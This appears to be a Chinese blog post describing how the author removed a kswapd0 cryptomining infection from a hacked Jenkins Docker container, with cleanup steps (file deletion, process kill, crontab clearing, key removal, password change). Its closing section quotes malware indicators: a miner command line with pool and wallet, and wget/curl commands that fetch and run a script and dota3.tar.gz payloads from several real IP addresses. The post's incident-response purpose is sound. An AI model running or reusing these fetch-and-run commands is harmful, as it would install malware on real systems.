Linux下清除挖矿病毒kswapd0

最近，服务器的docker容器被挖矿程序黑了，手动处理如下：

step1.删除相关病毒文件（删除后请再次查询确认是否删除成功）

执行查找命令  find / -name  kswapd0

显示查找结果：

/proc/3316/.X2c4-unix/.rsync/a/kswapd0
/root/.configrc5/a/kswapd0
/tmp/.X2c4-unix/.rsync/a/kswapd0
 
用 rm -rf 命令逐条删除上面3个路径文件。

step2.关闭对应进程：top 命令：
找到 进程名称内包含 kswapd0 的进程，kill -9 ID 干掉；

step3..删除病毒脚本定时执行对应的定时任务配置：
3.1查看linux 的定时任务进程，查看服务器的任务计划，可使用命令：  crontab -e

回显：

5 6 * * 0 /root/.configrc5/a/upd>/dev/null 2>&1
@reboot /root/.configrc5/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.configrc5/b/sync>/dev/null 2>&1
@reboot /root/.configrc5/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X2c4-unix/.rsync/c/aptitude>/dev/null 2>&1

这些都是和病毒后台下载运行有关的、直接VI编辑器进入清空强制保存；

PS：

1.注意这些文件路径，就是步骤1对应删除的文件，实际可以先执行step3,再执行step1,2
注意，这里需要多尝试保存几次，确认已清空；

2.chattr -i file.txt  这个命令可以修改文件权限，取消不可修改限制；遇到文件不能删除，请尝试查询和使用该命令；

step4.其他补充（可以不执行，仅作参考）：

4.1如果安装的docker某个容器被黑了，建议直接删除被黑的 docker 容器;

命令：docker  rm  容器ID；

4.2服务器安装git ,jenkens等等类似需要设置公钥密钥的工具，请在服务器内删除对应的公钥；

举例：我安装的了jenkins容器被黑,先删除对应 docker容器ID，再删除对应服务器配置的公钥，操作如下（删除这个是因为怕黑客复制了服务器所有文件，并尝试用上传同步工具上传代码）：

4.2.1查询公钥：cat ~/.ssh/authorized_keys

4.2.2删除对应公钥(这里我把所有公钥都删了，实际请按需删除)：rm ~/.ssh/authorized_keys

4.2.3重新安装删除的容器，使用最新的配置；

4.3请确认是否存在其他挖矿病毒，比如kdevtmpfsi等，处理都类似；可参照上面执行，个人建议起始第一步都是先关闭病毒对应进程作为第一步；

step5.最后重点：一定要修改密码~~~~。

执行完上面操作，阿里云上的服务器CPU使用率从50%，直接降低到5%以内，亲测有效；次日观察，确实恢复了

----------------------------------------------------

以下是挖矿程序病毒运行特征：

文件路径/root/.configrc5/a/kswapd0

恶意文件md58da798989b6e48fb211674b652119a8c

文件路径/proc/11389/root/var/jenkins_home/workspace/UpdateJenkins/trace

恶意文件md5a86abadfe98019aceccd8980666868de

扫描来源方式进程启动扫描

检测方式云查杀

进程id11977

进程命令行./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url auto.c3pool.org:13333 --user 83dxgsjgbnMN7Ej6GfCZMsfHYD3NYdozAhm7DjyTme6jTYPaJ8AQeEyMGKLRL1LjqXVSVBJgU3moYUECZjWUAkTi8rxSNZW --pass elf2 --keepalive

文件创建用户N/A

文件修改时间2020-10-19 04:25:59

容器名jenkins001  ---这个是我被黑的容器名称

容器ID25f083279e04cf6e923f6c453b80ef22ab4db9a6313c711754666432f2a1177f

镜像IDjenkins/jenkins@sha256:ea042d8f75dadddf3386456922a0868823164ab076e78ceef78e1593e8466247

镜像名jenkins/jenkins:latest

容器视角文件路径/var/jenkins_home/workspace/UpdateJenkins/trace

以下是自动执行的恶意脚本：

进程文件名bash

父进程IDXXXXX

父进程路径perl

父进程文件路径/usr/bin/perl

sh -c wget -q http://161.35.236.24/tddwrt7s.sh || curl -s -O -f http://161.35.236.24/tddwrt7s.sh 2>&1 3>&1

sh -c ./tddwrt7s.sh "http://167.172.213.233/dota3.tar.gz" "http://5.189.187.165/dota3.tar.gz" "http://216.70.68.24/dota3.tar.gz" "http://104.131.132.54/dota3.tar.gz" "http://89.108.94.182/dota3.tar.gz" "http://46.101.231.231/dota3.tar.gz" "http://46.101.83.106/dota3.tar.gz" >.out 2>&1 3>&1

服务器存在香港异地登录。。。。。虽然只是学习用的便宜机器。

再次强调，一定要修改密码，强度要高，设置了类似Pass1234这类简单密码，直接GG。。